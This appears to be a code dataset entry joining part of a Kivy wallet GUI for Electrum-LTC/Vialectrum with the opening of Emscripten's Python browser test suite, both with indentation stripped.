self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
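# get_max_amount computes the maximum spendable amount by building a dummy
# transaction whose single output has the value '!' (Electrum's "send max"
# marker), then subtracting any extra fee reported by the get_tx_extra_fee hook.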
def get_max_amount(self):
from electrum_ltc.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Vialectrum', message,
app_icon=icon, app_name='Vialectrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_ltc/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error message bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an info message bubble.
'''
self.show_error(error, icon='atlas://electrum_ltc/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Show an information bubble.
Parameters:
text: message to be displayed
pos: position of the bubble
duration: time the bubble remains on screen; 0 = click to hide
width: width of the bubble
arrow_pos: arrow position of the bubble; a falsy value hides the arrow
icon: icon (atlas path) to display, or a texture when text == 'texture'
modal: whether the bubble is shown as a modal view
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_ltc/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
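# Illustrative usage of show_info_bubble (not taken from the original sources;
# qr_texture below is hypothetical): passing text='texture' together with a
# Kivy texture as `icon` displays that texture full screen instead of a text
# bubble, e.g.
#   app.show_info_bubble(text='texture', icon=qr_texture, duration=0)
# Plain calls such as show_error()/show_info() above go through the same method.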
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
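# Both _sign_tx (above) and _broadcast_thread (below) run on worker threads and
# hand their results back to the Kivy main loop via Clock.schedule_once, since
# UI callbacks such as show_error are expected to run on the main thread.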
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
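# protected() is the generic guard used by the sensitive actions below
# (show_seed, export_private_keys, wallet deletion): the wrapped function f is
# only called, with self.password appended to its arguments, once the PIN
# prompt or confirmation dialog succeeds.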
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except Exception:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, requires_v8, also_with_minimal_runtime
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
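# This helper is meant to run alongside a browser test (the multiprocessing
# import above suggests a separate process), serving expectedConns + 1 requests
# and then returning. A minimal sketch, with hypothetical argument values:
#   p = multiprocessing.Process(target=test_chunked_synchronous_xhr_server,
#                               args=(True, 1024, data, checksum, 8888))
#   p.start()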
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
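# also_with_wasmfs and also_with_wasm2js expose their variants through the
# _parameterize attribute; the test harness in common.py presumably expands
# each key of that dict into a separate test case, passing the associated tuple
# as extra arguments (the same mechanism @parameterized uses explicitly below).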
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
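# also_with_threads runs the decorated test twice: once as-is and, unless
# EMTEST_LACKS_THREAD_SUPPORT is set, a second time with -pthread added to
# emcc_args.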
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
create_file(cpp_file, r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On other platforms they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
